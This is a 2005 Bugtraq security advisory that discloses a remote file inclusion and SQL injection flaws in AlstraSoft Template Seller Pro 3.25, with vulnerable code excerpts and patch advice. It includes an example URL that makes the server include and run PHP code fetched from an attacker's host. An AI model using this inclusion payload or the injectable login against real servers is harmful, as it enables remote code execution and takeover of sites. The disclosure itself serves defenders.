[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Template Seller Pro 3.25
From:       r.verton () gmail ! com
Date:       2005-11-15 19:39:01
Message-ID: 20051115193901.15910.qmail () securityfocus ! com
[Download RAW message or body]

AlstraSoft Template Seller Pro 3.25 
===================================

   Software: AlstraSoft Template Seller Pro 3.25
   Severity: Arbitrary code execution, SQL Injection(s)
   Risk: High
   Author: Robin Verton <r.verton@gmail.com>
   Date: Nov. 15 2005
   Vendor: www.alstrasoft.com


   Description:

	Ever thought of starting your very own profitable shopping cart business just like \
TemplateMonster.com?   With AlstraSoft Template Seller Pro software, you can run your \
own templates store selling templates such   as website templates, logo templates, \
flash intro templates, frontpage templates and many more! The   flexibility of \
Template Seller Pro  software also allows you to run a membership based templates \
business   just like BoxedArt.com by offering paid members multiple templates \
download instantly.  [http://www.alstrasoft.com/]


   Details:

	1) /include/paymentplugins/payment_paypal.php

	   /**
	   Paypal payment plugin
	   */
	  global $config,$conn;
	  include("$config[basepath]/include/payment/class.paypal_ipn.php");
	  include("$config[basepath]/include/paymentplugins/paymentplugin.php");

	   
	  If register_globals is set on, we can include and execute any php code of our \
choice. This is very dangerous  because if safe_mode is off and there are no \
restriction for execution commands an attacker can get access  to each file on the \
server.

	  http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://youhost.com/our-code.txt?


	  Because of the trailing '?' we pass the '/include/payment/class.paypal_ipn.php' \
from the include statement as a parameter  to the our-code.php script so only the \
script we set in $config[basepath] is included.

	2) /admin/index.php

	  $sql_user_name = $user_name;
	  $md5_pass = md5($user_pass);
						
	  $sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and \
user_password='$md5_pass'";

	  The User submitted variable for the username is inserted into the database without \
andy validation. Because of this  we can insert malicious code into the database.

	Nearly NO user-submitted variable is validated , so there are a few more \
SQL-injections possible.   
	   
	   
   Patch:
          Insert constants and use the following code to prevent against such attacks

	  if( !defined('IN_SYS') ) {
		die('Hacking Attempt!');
	  }

	  and activate magic_quotes_gpc
  
   Credits:

	Credit goes to Robin Verton

   References:

	[1] http://www.alstrasoft.com/template.htm
	[2] http://myblog.it-security23.net


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic